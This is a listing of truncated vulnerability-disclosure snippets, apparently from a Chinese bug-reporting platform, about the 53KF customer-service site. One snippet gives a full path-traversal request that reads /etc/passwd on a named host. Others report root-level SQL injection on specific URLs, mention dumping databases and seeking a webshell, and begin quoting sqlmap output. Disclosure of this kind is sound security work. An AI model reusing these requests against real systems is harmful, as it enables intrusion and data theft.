53KF某重要站点任意文件读取

简要描述： 详细说明： 网站：tel.53kf.com controller可控 request： GET /external.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00web&style=61565627-4006633536-103387129 HTTP/1.1 User-Agent: Mozilla/5.0 Windows; U; Windows NT 6.1; en-US Accept: /...

53kf.com的SQL严重注入漏洞

简要描述： Mysql用户为Root啊，估计跟前面两位兄弟一样问题，最后，亲还有礼物吗？ 详细说明： sqlinj http://www10.53kf.com/iframebrief.php?styleid=103560295 漏洞证明： 大家都懂的...

继续53KF平台root注入和clzzy兄弟一样求礼物！

简要描述： 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤，Mysql用户为Root，虽不能写文件，但是可以读文件，文件代码看光光由于找不到后台，暂时没拿到webshell，反正拿不拿shell估计都是20个Rank，所以懒得费劲了借用一下clzzy的描述就不打字了！求礼物 详细说明：...

53kf.com的SQL严重注入漏洞

简要描述： 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤，Mysql用户为Root，虽不能写文件，但是可以读文件，文件代码看光光由于找不到后台，暂时没拿到webshell，反正拿不拿shell估计都是20个Rank，所以懒得费劲了 详细说明： sqlmap identified the following injection points with a total of 57 HTTPs requests: --- Place: GET Parameter: noticeid Type: boolean-based blind Title: AND...